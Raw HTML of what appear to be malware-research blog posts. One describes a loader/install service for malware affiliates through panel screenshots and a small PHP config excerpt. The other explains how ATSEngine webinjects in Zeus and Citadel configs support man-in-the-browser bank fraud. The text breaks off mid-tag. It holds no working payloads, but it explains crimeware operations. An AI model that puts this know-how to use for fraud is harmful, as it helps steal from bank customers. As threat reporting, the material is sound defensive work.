href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgsAqMsjJdVfs8aJTVPL-fQsS4Y4j3EfSKWYjNLEpbt0faso1MtuGy11TRqY3KgJw1jdGCY4b94RHb4pKkt1d0ztNKmTMu0joK67T5QLs0LURoVTV_8GsVL7boUiOUepH7O_rE8sz_I_iI/s1600/15-07-2013+14-50-07.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgsAqMsjJdVfs8aJTVPL-fQsS4Y4j3EfSKWYjNLEpbt0faso1MtuGy11TRqY3KgJw1jdGCY4b94RHb4pKkt1d0ztNKmTMu0joK67T5QLs0LURoVTV_8GsVL7boUiOUepH7O_rE8sz_I_iI/s400/15-07-2013+14-50-07.png" height="231" width="400" /></a></div> (Version, Unique visits, Percentage, General visits)<br /> <br /> Statistics by time:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEigrpzbQIjuZ9m3qdyaCo7qKKJGQYUwXqxUUVstoHrka04BvLEi3kMItMUgV_mggH_R0vA4a9d6JR2ScyDnPvj6w71VxnaXaKAAPezw7XZ87iOPXklnwFDpl6jepLoO5lscS4gml2zltrY/s1600/15-07-2013+14-55-16.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEigrpzbQIjuZ9m3qdyaCo7qKKJGQYUwXqxUUVstoHrka04BvLEi3kMItMUgV_mggH_R0vA4a9d6JR2ScyDnPvj6w71VxnaXaKAAPezw7XZ87iOPXklnwFDpl6jepLoO5lscS4gml2zltrY/s320/15-07-2013+14-55-16.png" height="172" width="320" /></a></div> (Time,&nbsp; Users)<br /> <br /> Downloads:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj-5KFjcdaKJ0J4WmzeErSn-W9kcpUi5WDaK7lLXd7u-O67VkbgOqDTT7gCQr_zJirEScYaV4RKKnQaPuPcioZ0Wzg9ins3h4g2BJobni8drmHBC6Geu4kibZswAfExzITFh29yg_s7jwc/s1600/15-07-2013+14-56-15.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj-5KFjcdaKJ0J4WmzeErSn-W9kcpUi5WDaK7lLXd7u-O67VkbgOqDTT7gCQr_zJirEScYaV4RKKnQaPuPcioZ0Wzg9ins3h4g2BJobni8drmHBC6Geu4kibZswAfExzITFh29yg_s7jwc/s400/15-07-2013+14-56-15.png" height="215" width="400" /></a></div> (Date, Already installed, ???? installed, Successfully installed, Copy failed, Modify failed, Register failed)<br /> <br /> Updates:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg0rMee-7pdWouT0eRULJlNE5WtWMmC5C__WuifvL-wugMRqQ46PmZdh66tvY-Y-YfqTSUqbTiTmPDGEXcQOncHpqkj17aMWt5zvLppsr8lJWmXeOK3nSZYg82MIxY1K8mcL60Mwhyphenhyphen_HwY/s1600/15-07-2013+14-57-40.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg0rMee-7pdWouT0eRULJlNE5WtWMmC5C__WuifvL-wugMRqQ46PmZdh66tvY-Y-YfqTSUqbTiTmPDGEXcQOncHpqkj17aMWt5zvLppsr8lJWmXeOK3nSZYg82MIxY1K8mcL60Mwhyphenhyphen_HwY/s400/15-07-2013+14-57-40.png" height="215" width="400" /></a></div> (Date, Begin update, Downloaded update, Executed update, No ATL, Execution failed)<br /> <br /> Statistics by tasks:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh9JG0_2DMJtICBGIIvEuSjPWwa1eTchGQUrkgl732kwUhM6cGDwg4XpInHkIUtrTX8t_q91PgQPck7_7HcJuuhqlEgoyGQ-OsM9lqNwz90sBSRoabgOgOAPCbKxo-ROyJZl4IQYC5mtl0/s1600/15-07-2013+14-59-13.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh9JG0_2DMJtICBGIIvEuSjPWwa1eTchGQUrkgl732kwUhM6cGDwg4XpInHkIUtrTX8t_q91PgQPck7_7HcJuuhqlEgoyGQ-OsM9lqNwz90sBSRoabgOgOAPCbKxo-ROyJZl4IQYC5mtl0/s400/15-07-2013+14-59-13.png" height="320" width="400" /></a></div> (Date, Start of xxxx, Searches, Clicks, ???)<br /> <br /> Statistics by sites:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh8nKZ7xNlxAMYcEK2Br4dck7S8YMG0a0bEZZH6PAnJ2vmDbVP0tRlQTEATKTP3XN-LDWpYy5TVjwNtQG7kiGQmVsA8Gj1bhbn4eMauCHp-_qDaGXxf47pF89M3-7B_DBNlCoicN0w3EUk/s1600/15-07-2013+15-00-53.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh8nKZ7xNlxAMYcEK2Br4dck7S8YMG0a0bEZZH6PAnJ2vmDbVP0tRlQTEATKTP3XN-LDWpYy5TVjwNtQG7kiGQmVsA8Gj1bhbn4eMauCHp-_qDaGXxf47pF89M3-7B_DBNlCoicN0w3EUk/s400/15-07-2013+15-00-53.png" height="207" width="400" /></a></div> <br /> Statistics by ads:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgmkYxfH9HGN-4-4mvWVNmQzsIBpNiHdUS30yaTYX5IVb3kkBzIdrjO1wfxTNv98yiw9sicAo4cAl0bvpsQEF-HrnCgakwa3vSth3do1Jce8WalK6tsxYa035SerRFeE0WezVgoG3iZ3QY/s1600/15-07-2013+15-02-36.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgmkYxfH9HGN-4-4mvWVNmQzsIBpNiHdUS30yaTYX5IVb3kkBzIdrjO1wfxTNv98yiw9sicAo4cAl0bvpsQEF-HrnCgakwa3vSth3do1Jce8WalK6tsxYa035SerRFeE0WezVgoG3iZ3QY/s320/15-07-2013+15-02-36.png" height="276" width="320" /></a></div> <br /> Loader, users list:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgxol7NsVq0tYABh3CvZfR7H98eeq99T6ljPT2azmLO0058BvbbMT07MmdyR_2raEUis2rTMkr3L9ZYAxgXlYIHgRmdWdUkIevYdoE8O51ir9JYiDMDEXyR1welpI_o0EVRQ3XecaSu0Q8/s1600/15-07-2013+15-35-20.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgxol7NsVq0tYABh3CvZfR7H98eeq99T6ljPT2azmLO0058BvbbMT07MmdyR_2raEUis2rTMkr3L9ZYAxgXlYIHgRmdWdUkIevYdoE8O51ir9JYiDMDEXyR1welpI_o0EVRQ3XecaSu0Q8/s400/15-07-2013+15-35-20.png" height="320" width="400" /></a></div> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgAzgJMV-0r88CqpiRRBKoGh1JF8yDU8Kr2IQnEpPflduNyxTf-b65PInbEZugtMGOnAvK_1hgjIXjO7MEaidmfp9BxdLFETqXeHpMUKN4KRQvGuEuts5VWvN-agsPgg26stWEXV5MQTow/s1600/15-07-2013+15-36-14.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgAzgJMV-0r88CqpiRRBKoGh1JF8yDU8Kr2IQnEpPflduNyxTf-b65PInbEZugtMGOnAvK_1hgjIXjO7MEaidmfp9BxdLFETqXeHpMUKN4KRQvGuEuts5VWvN-agsPgg26stWEXV5MQTow/s400/15-07-2013+15-36-14.png" height="320" width="400" /></a></div> <div class="separator" style="clear: both; text-align: center;"> </div> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj_U1qwftPwt868QHyLx5ef2MAEY_X1iAN5pRnQopUCRIqGdWEgulmKuSWcvbrAjy-GKIijtJluJ0lJqhbTZXp8QBTJ7Ytub4XH1RdnAiIznIkYCokkRjWg4Wk9L8AyChTp6CGj1Ljxvtk/s1600/15-07-2013+15-37-00.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj_U1qwftPwt868QHyLx5ef2MAEY_X1iAN5pRnQopUCRIqGdWEgulmKuSWcvbrAjy-GKIijtJluJ0lJqhbTZXp8QBTJ7Ytub4XH1RdnAiIznIkYCokkRjWg4Wk9L8AyChTp6CGj1Ljxvtk/s1600/15-07-2013+15-37-00.png" height="320" width="400" /></a></div> &nbsp;(Nickname, ID, Priority, Ban, GEO, Days, General limit, Working conditions, Today, Summary, Size, Time, File)<br /> <br /> There is some interesting people in this listing:<br /> <a href="http://www.xylibox.com/2011/06/tracking-cyber-crime-severa.html">Severa</a> (Know for FakeAV, Spam)<br /> <a href="http://www.blogger.com/"><span id="goog_1082891782"></span></a><a href="http://www.xylibox.com/2011/11/tracking-cyber-crime-malwox-win32cidox.html">Malwox</a><a href="http://www.xylibox.com/2011/11/tracking-cyber-crime-malwox-win32cidox.html"><span id="goog_1082891783"></span> Affiliate</a> (Mayachok.1)<br /> <a href="http://www.xylibox.com/2013/07/feodalcash-affiliate-trojanwin32tarcloin.html">Feodal cash Affiliate</a> (Bitcoin malware)<br /> <br /> And if you want to know about the EXE files loaded... all are malwares (Zeus,SpyEye, Russian lockers, Spam bots, Mayachok... etc..)<br /> The x64 Zbot covered by Kaspersky also come from here.<br /> <br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhtBQGgx60qreJl5NwPtTxc4QhtrXh-0G0RYYH4rW3LpUJ3DoelOUio627uCLlQ2JFCV12GpR7CVhOOMGcghriZNd_YTlhVDCHcQKWsLIL0xIFtzfHAuQRyaeJsKsgstrCMHD2XcuftV3I/s1600/LwUMY5b.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhtBQGgx60qreJl5NwPtTxc4QhtrXh-0G0RYYH4rW3LpUJ3DoelOUio627uCLlQ2JFCV12GpR7CVhOOMGcghriZNd_YTlhVDCHcQKWsLIL0xIFtzfHAuQRyaeJsKsgstrCMHD2XcuftV3I/s400/LwUMY5b.png" height="208" width="400" /></a></div> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgFtE6n3xIYx0TSYj79Jooy667r0ADfQT23Kk_UBQe5L05VTzc-lrofujIc5NxaI8EBAs-MghDIYNlmibv5si4dfGkwGMEnMxln6VHdUb-v4fu5HCC6vWlu1Edg6EfOtwJ8KWqm_MgoX2k/s1600/b84DGOa.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgFtE6n3xIYx0TSYj79Jooy667r0ADfQT23Kk_UBQe5L05VTzc-lrofujIc5NxaI8EBAs-MghDIYNlmibv5si4dfGkwGMEnMxln6VHdUb-v4fu5HCC6vWlu1Edg6EfOtwJ8KWqm_MgoX2k/s400/b84DGOa.png" height="228" width="400" /></a></div> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgB9TrxQimmgPuetWx4osVJpduQzAKPwRzkcTBGyuqGAloVStks4TO2WJzjC_moIxZh856AdjB9Y3yoK7BD_2z7NoFJYj4tAQ1hpzOnzmLP1YqibTRtPMlHdYGRsHbNmgkIKpM7JXt6qfo/s1600/S429X9C.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgB9TrxQimmgPuetWx4osVJpduQzAKPwRzkcTBGyuqGAloVStks4TO2WJzjC_moIxZh856AdjB9Y3yoK7BD_2z7NoFJYj4tAQ1hpzOnzmLP1YqibTRtPMlHdYGRsHbNmgkIKpM7JXt6qfo/s400/S429X9C.png" height="227" width="400" /></a></div> <a href="http://www.kernelmode.info/forum/viewtopic.php?f=16&amp;t=1363&amp;start=50#p19625">http://www.kernelmode.info/forum/viewtopic.php?f=16&amp;t=1363&amp;start=50#p19625</a><br /> <a href="http://www.kernelmode.info/forum/viewtopic.php?f=16&amp;t=648&amp;start=40#p19621">http://www.kernelmode.info/forum/viewtopic.php?f=16&amp;t=648&amp;start=40#p19621</a><br /> The executables was rotating and was refreshed constantly, from this system, around 400 samples can be pulled per day.<br /> <br /> Download statistics for client 191 ( Malwox TEST ):<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgEIbGJTsvUfFcteXmYxVgz9wsNsTuNt4z-2RZ2D_1PSMXtDXi8qR3vuOIYpHLOrbXWiVLmQyXfUX3vk8hBB49Ip6Pqo2xNj46s1H_VndzqG6wglaYJZhDxlbmnD0wPCGstVG_qSi22_Ng/s1600/15-07-2013+15-47-44.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgEIbGJTsvUfFcteXmYxVgz9wsNsTuNt4z-2RZ2D_1PSMXtDXi8qR3vuOIYpHLOrbXWiVLmQyXfUX3vk8hBB49Ip6Pqo2xNj46s1H_VndzqG6wglaYJZhDxlbmnD0wPCGstVG_qSi22_Ng/s400/15-07-2013+15-47-44.png" height="321" width="400" /></a></div> (Date,&nbsp; Derved, Executed, Ctr, Create, Exists, Down, Run, Unp)<br /> <br /> Edit user:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh_lnh2gPwhFuq0O2Nr_LbBvlX9Q_XfLwheKTUscoL0o62ZB2jK4ruf1PTJymV6nu0wGkNi_VycavsFOeMUdKFfUIbeC6gfyBPpZrSNryhvP39ZUSIQj5_s5nlbVeGgiN86GpdQMWSvtZg/s1600/15-07-2013+15-45-55.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh_lnh2gPwhFuq0O2Nr_LbBvlX9Q_XfLwheKTUscoL0o62ZB2jK4ruf1PTJymV6nu0wGkNi_VycavsFOeMUdKFfUIbeC6gfyBPpZrSNryhvP39ZUSIQj5_s5nlbVeGgiN86GpdQMWSvtZg/s400/15-07-2013+15-45-55.png" height="400" width="305" /></a></div> <br /> <div class="separator" style="clear: both; text-align: center;"> </div> Add user:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjngcDJTE9bxtfAgtmHBCkCjoUxb85iV4fLSeGJF_I-mD0uVObEPrbLnMVVR8jpeTb5raA0kvCGy0ZTfpy9p-b3Hs5OuBlC_l-P-OlaRgUb6R-MGSSGfXU_ee6TS1tzEotebUJDM8y7gVM/s1600/15-07-2013+15-39-18.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjngcDJTE9bxtfAgtmHBCkCjoUxb85iV4fLSeGJF_I-mD0uVObEPrbLnMVVR8jpeTb5raA0kvCGy0ZTfpy9p-b3Hs5OuBlC_l-P-OlaRgUb6R-MGSSGfXU_ee6TS1tzEotebUJDM8y7gVM/s400/15-07-2013+15-39-18.png" height="302" width="400" /></a></div> <br /> Schedule for user:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjcbftY-1lSe7Uawah8Kc6cf8EHeag3HmTcMyUnE5mbizK6Pc28RhxelHE2OWCZrtDvnx9VfQrnqYVa1i4TYyegWp20yAsRRsddz9acKT6vbGYSec0gUREROj_buyEmQws0oPorKe11qUg/s1600/15-07-2013+15-39-59.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjcbftY-1lSe7Uawah8Kc6cf8EHeag3HmTcMyUnE5mbizK6Pc28RhxelHE2OWCZrtDvnx9VfQrnqYVa1i4TYyegWp20yAsRRsddz9acKT6vbGYSec0gUREROj_buyEmQws0oPorKe11qUg/s400/15-07-2013+15-39-59.png" height="321" width="400" /></a></div> <br /> FTP:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj2j1t58b-Xh2K_wMo1Hx9BXacCXJFoLEGWYAozvlkVLSn-U3srzSN-fHksEzW29CUQzNvLO-kg73R4RykjXzum4ka2BX4k8cTpk6bbtCxbC61wucVfphWScR-Qvf6fjRLfFRt_fcwOlZ0/s1600/15-07-2013+15-40-49.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj2j1t58b-Xh2K_wMo1Hx9BXacCXJFoLEGWYAozvlkVLSn-U3srzSN-fHksEzW29CUQzNvLO-kg73R4RykjXzum4ka2BX4k8cTpk6bbtCxbC61wucVfphWScR-Qvf6fjRLfFRt_fcwOlZ0/s400/15-07-2013+15-40-49.png" height="321" width="400" /></a></div> Menu: users list, add, FTP, Stats.<br /> <br /> For the FTP list, most of accounts were with shell on them.<br /> <br /> Structure: <br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg4zIfM_SXHfa2N8fTFlLDXVMvaiBdmzNxct2O55odOpxf47Lt7NV31dqLNOmebS-odKH-8IJm7YTH-XgD4iIfS3Cl4cHGDGDaioBoUZeD56ld608l_qZvi91YsxdDo9ZlJhRETKcZ4qRs/s1600/2014-05-05_13-01-30.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg4zIfM_SXHfa2N8fTFlLDXVMvaiBdmzNxct2O55odOpxf47Lt7NV31dqLNOmebS-odKH-8IJm7YTH-XgD4iIfS3Cl4cHGDGDaioBoUZeD56ld608l_qZvi91YsxdDo9ZlJhRETKcZ4qRs/s1600/2014-05-05_13-01-30.png" height="290" width="400" /></a></div> <br /> From the source:<br /> <div class="php" style="background-color: #f0f0f0; border: 1px solid #d0d0d0; color: #000066; font-family: monospace;"> <span style="color: #000088;">$useZorkaJob</span> <span style="color: #339933;">=</span> <span style="color: #cc66cc;">0</span><span style="color: #339933;">;</span> <span style="color: #666666; font-style: italic;">//схч чрїюфр</span><br /> <span style="color: #000088;">$useSputnikJob</span> <span style="color: #339933;">=</span> <span style="color: #cc66cc;">0</span><span style="color: #339933;">;</span><br /> <span style="color: #000088;">$useRekloJob</span> <span style="color: #339933;">=</span> <span style="color: #cc66cc;">0</span><span style="color: #339933;">;</span><br /> <span style="color: #000088;">$useSpoiskJob</span> <span style="color: #339933;">=</span> <span style="color: #cc66cc;">0</span><span style="color: #339933;">;</span><br /> <span style="color: #000088;">$useBegunCheatJob</span> <span style="color: #339933;">=</span> <span style="color: #cc66cc;">0</span><span style="color: #339933;">;</span></div> Begun is one of the biggest ads services in Russia.https://www.xylibox.com/2014/05/install-service-for-malware-affiliates.htmlnoreply@blogger.com (Steven K)5tag:blogger.com,1999:blog-5365964245877416061.post-3555705715129142971Sat, 03 May 2014 23:12:00 +00002014-05-04T01:12:40.465+02:00ATSATSEngineBc5rw12Man in the browserMITBWebinjectyummbaZeuSATSEngine injects can be found oftenly inside Zeus configs, it makes the webinjects more dynamic because most of the content is located remotely and can be updated much easily instead of sending new config to all the bots.<br /> It's the main difference with this, and a standard web inject inside Zeus.<br /> One just allows you to do a static change in the page while the other gives you much more options, for example, customized webinjects, pop-ups, online requests for token etc...<br /> ATSEngine have also a jabber alert feature, it let the fraudster know when the victim is logged to his bank account so it would be a god time to backconnect him (with the VNC feature of Zeus) and do the transaction.<br /> Most of ATSEngine panels are also hosted on SSL because banks use SSL. <br /> <br /> <div class="separator" style="clear: both; text-align: center;"> </div> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiPhLmFFYYiVauEai3wB2OJKKdX3U24LaqWezrJvqxVt5XUsvsCTJ4JZnlXAwLNlF8u8-HYJBiWH2lEYmnBP7uf0wtFRGLcna-izJmsr9AoR6IwdsJwJSy8b1W7Yv4UMuJ_uJapljqTZ1M/s1600/2014-05-04_12-19-42.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiPhLmFFYYiVauEai3wB2OJKKdX3U24LaqWezrJvqxVt5XUsvsCTJ4JZnlXAwLNlF8u8-HYJBiWH2lEYmnBP7uf0wtFRGLcna-izJmsr9AoR6IwdsJwJSy8b1W7Yv4UMuJ_uJapljqTZ1M/s1600/2014-05-04_12-19-42.png" height="77" width="400" /></a></div> ATSEngine on a ZeusVM config.<br /> <br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh0OSwWoloh7S6BPTKULZq51ZxklEkBpr9rviGatBabWcVvdbovbTTofdttIP6gXYoZ0Eu0HLA-dCnnk3AGxP4lhhIxQU2W-YH3p08EOU76WL-XXIEs4lgCsnHABEYSNsAsMCDkyFH_W5A/s1600/2014-05-04_12-25-03.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh0OSwWoloh7S6BPTKULZq51ZxklEkBpr9rviGatBabWcVvdbovbTTofdttIP6gXYoZ0Eu0HLA-dCnnk3AGxP4lhhIxQU2W-YH3p08EOU76WL-XXIEs4lgCsnHABEYSNsAsMCDkyFH_W5A/s1600/2014-05-04_12-25-03.png" height="103" width="400" /></a></div> ATSEngine on a Citadel config.<br /> Example of <a href="http://pastebin.com/MBw8HcCB">figrabber.js</a> from an ATSEngine panel.<br /> <br /> Some guys do also a business with this type of web injects, for example:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgF0ILpLY9wIP5U7B5I5XjOu5CExSw8JbZM72h9vty_TqkCN4Saz6Wat2ZzotvN67jR4pSjYOprJbDVk4tbgDexmbIyzwUdyjP8rMhBpfndBFRs6LaNLUqJlJsOrazkgJQkTy-yn2kAiPc/s1600/02-01-2014+21-24-42.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgF0ILpLY9wIP5U7B5I5XjOu5CExSw8JbZM72h9vty_TqkCN4Saz6Wat2ZzotvN67jR4pSjYOprJbDVk4tbgDexmbIyzwUdyjP8rMhBpfndBFRs6LaNLUqJlJsOrazkgJQkTy-yn2kAiPc/s400/02-01-2014+21-24-42.png" height="398" width="400" /></a></div> He's offering a service for writing injects.<br /> The title says "Auto-uploads and Injects from professionals for professionals"<br /> The rest of the text explains how the service works, it's more a terms and conditions post rather than a technical description of the product, about moneyback, privacy, guarantees and other stuff.<br /> They dont write mobile botnets, trojan horses, traffic direction systems or other malware software except injects, also they dont guarantee bypass of protection (like Rapport).<br /> yummba is know anyway for writing injects for ATSEngine.<br /> <br /> Let's have a look on a C&amp;C now..<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhMUAdNIgrEQNpAYxpa3gjcJkqgYVtzFnSuty85BL8EyUQDqskRyfHIFgedC5cwQ-VSqqF2MNTfK0iZvwnGroUd_KuSF6Zl7K2PjsUYazcM1ClEWnVoC2EEpUeKxgxQpb8pqjT6VkUMpaI/s1600/R9e1D23.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhMUAdNIgrEQNpAYxpa3gjcJkqgYVtzFnSuty85BL8EyUQDqskRyfHIFgedC5cwQ-VSqqF2MNTfK0iZvwnGroUd_KuSF6Zl7K2PjsUYazcM1ClEWnVoC2EEpUeKxgxQpb8pqjT6VkUMpaI/s1600/R9e1D23.png" /></a></div> <br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhq6Sqk0w7-6dJbl7AG6U55skaiu92qoaKoDFT8Pfw6aAcfz0XpoF_HzY5398ddmC-6H-U4YwcfXfeh17vCNKYWw1u9zNX6zr_0zXW0bzwVKZj-CCydlXJW_0F_K2IndEzqjtoRZSaNvfQ/s1600/BqHPLni.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhq6Sqk0w7-6dJbl7AG6U55skaiu92qoaKoDFT8Pfw6aAcfz0XpoF_HzY5398ddmC-6H-U4YwcfXfeh17vCNKYWw1u9zNX6zr_0zXW0bzwVKZj-CCydlXJW_0F_K2IndEzqjtoRZSaNvfQ/s1600/BqHPLni.png" /></a></div> <br /> Accounts:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgZVpC6UYtorJqLLG1icTy-OByWabQZo10EIcvmbK63rqtZsCmJKwWRdssGeqnz1DNgUzKozkAvwN6sDsGBBKrB7h3Wju98jcz759hM56khxe1PcI27V7kU23ZlozTq0M898VHrSVAMlng/s1600/02-01-2014+21-03-17.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgZVpC6UYtorJqLLG1icTy-OByWabQZo10EIcvmbK63rqtZsCmJKwWRdssGeqnz1DNgUzKozkAvwN6sDsGBBKrB7h3Wju98jcz759hM56khxe1PcI27V7kU23ZlozTq0M898VHrSVAMlng/s400/02-01-2014+21-03-17.png" height="317" width="400" /></a></div> <br /> Reports:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhjpestNbojwrxba_9ZnuecB3yQ40rBTEvaSX0wz1UJU27FXO7WeFT7DR9_kcoJ2eSLBKp67tEakO2pyYxIlV591K6-TGHWE9kbBYaTQZFd9PvecBpxdlvXDDehdrXXKyaab3MrRiCPkdc/s1600/02-01-2014+21-13-52.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhjpestNbojwrxba_9ZnuecB3yQ40rBTEvaSX0wz1UJU27FXO7WeFT7DR9_kcoJ2eSLBKp67tEakO2pyYxIlV591K6-TGHWE9kbBYaTQZFd9PvecBpxdlvXDDehdrXXKyaab3MrRiCPkdc/s400/02-01-2014+21-13-52.png" height="317" width="400" /></a></div> <br /> Options main:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgic_Fv_6zr7gaI10mRq4ymqi8kLNMyE51WH8S7jPL3mt6H1dkllzAvykJBCE6jDboNdMaKjhxCiAucl4vpb5CGhxE6C3KNrpkrEuXKSoV5HDxhdhL2wemZn0wWkkozzASG3LFu1A46le8/s1600/02-01-2014+21-21-25.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgic_Fv_6zr7gaI10mRq4ymqi8kLNMyE51WH8S7jPL3mt6H1dkllzAvykJBCE6jDboNdMaKjhxCiAucl4vpb5CGhxE6C3KNrpkrEuXKSoV5HDxhdhL2wemZn0wWkkozzASG3LFu1A46le8/s400/02-01-2014+21-21-25.png" height="331" width="400" /></a></div> <br /> Options Jabber:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjQjyTE8DX0Jdnqf5VSU3ah1NUj9IKBgTtycNlbkmttRwaWBDq8UhH4QepfE4OJjDo6lkHeXOcd4z2agrT9ITTvoqhA1ZTcTqRqP9hiw4TCCdTOzLPwl33klaquCOwkgYrD0_5TL5JaYX4/s1600/02-01-2014+21-22-25.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjQjyTE8DX0Jdnqf5VSU3ah1NUj9IKBgTtycNlbkmttRwaWBDq8UhH4QepfE4OJjDo6lkHeXOcd4z2agrT9ITTvoqhA1ZTcTqRqP9hiw4TCCdTOzLPwl33klaquCOwkgYrD0_5TL5JaYX4/s400/02-01-2014+21-22-25.png" height="331" width="400" /></a></div> <br /> Another panel, on SSL:<br /> <div class="separator" 